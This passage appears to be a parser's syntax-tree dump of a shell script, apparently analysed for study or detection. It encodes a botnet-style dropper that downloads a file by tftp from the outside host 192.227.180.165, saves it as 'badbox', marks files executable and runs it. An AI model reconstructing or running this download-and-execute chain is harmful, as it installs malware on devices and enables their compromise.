    WordNode(lineno=15, pos=(1573, 1575), word='+x'),
    WordNode(lineno=15, pos=(1576, 1577), word='*'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1577, 1578)),
  CommandNode(lineno=15, pos=(1578, 1586), parts=[
    WordNode(lineno=15, pos=(1578, 1586), word='./badbox'),
  ]),
])
ListNode(lineno=16, pos=(1587, 1729), parts=[
  CommandNode(lineno=16, pos=(1587, 1594), parts=[
    WordNode(lineno=16, pos=(1587, 1589), word='cd'),
    WordNode(lineno=16, pos=(1590, 1594), word='/tmp'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1595, 1597)),
  CommandNode(lineno=16, pos=(1598, 1609), parts=[
    WordNode(lineno=16, pos=(1598, 1600), word='cd'),
    WordNode(lineno=16, pos=(1601, 1609), word='/var/run'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1610, 1612)),
  CommandNode(lineno=16, pos=(1613, 1620), parts=[
    WordNode(lineno=16, pos=(1613, 1615), word='cd'),
    WordNode(lineno=16, pos=(1616, 1620), word='/mnt'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1621, 1623)),
  CommandNode(lineno=16, pos=(1624, 1632), parts=[
    WordNode(lineno=16, pos=(1624, 1626), word='cd'),
    WordNode(lineno=16, pos=(1627, 1632), word='/root'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1633, 1635)),
  CommandNode(lineno=16, pos=(1636, 1640), parts=[
    WordNode(lineno=16, pos=(1636, 1638), word='cd'),
    WordNode(lineno=16, pos=(1639, 1640), word='/'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1640, 1641)),
  CommandNode(lineno=16, pos=(1642, 1683), parts=[
    WordNode(lineno=16, pos=(1642, 1646), word='tftp'),
    WordNode(lineno=16, pos=(1647, 1662), word='192.227.180.165'),
    WordNode(lineno=16, pos=(1663, 1665), word='-c'),
    WordNode(lineno=16, pos=(1666, 1669), word='get'),
    WordNode(lineno=16, pos=(1670, 1683), word='dfjdjgfjdfjfd'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1683, 1684)),
  CommandNode(lineno=16, pos=(1684, 1709), parts=[
    WordNode(lineno=16, pos=(1684, 1687), word='cat'),
    WordNode(lineno=16, pos=(1688, 1701), word='dfjdjgfjdfjfd'),
    RedirectNode(lineno=16, output=
      WordNode(lineno=16, pos=(1703, 1709), word='badbox'), pos=(1702, 1709), type='>'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1709, 1710)),
  CommandNode(lineno=16, pos=(1710, 1720), parts=[
    WordNode(lineno=16, pos=(1710, 1715), word='chmod'),
    WordNode(lineno=16, pos=(1716, 1718), word='+x'),
    WordNode(lineno=16, pos=(1719, 1720), word='*'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1720, 1721)),
  CommandNode(lineno=16, pos=(1721, 1729), parts=[
    WordNode(lineno=16, pos=(1721, 1729), word='./badbox'),
  ]),
])
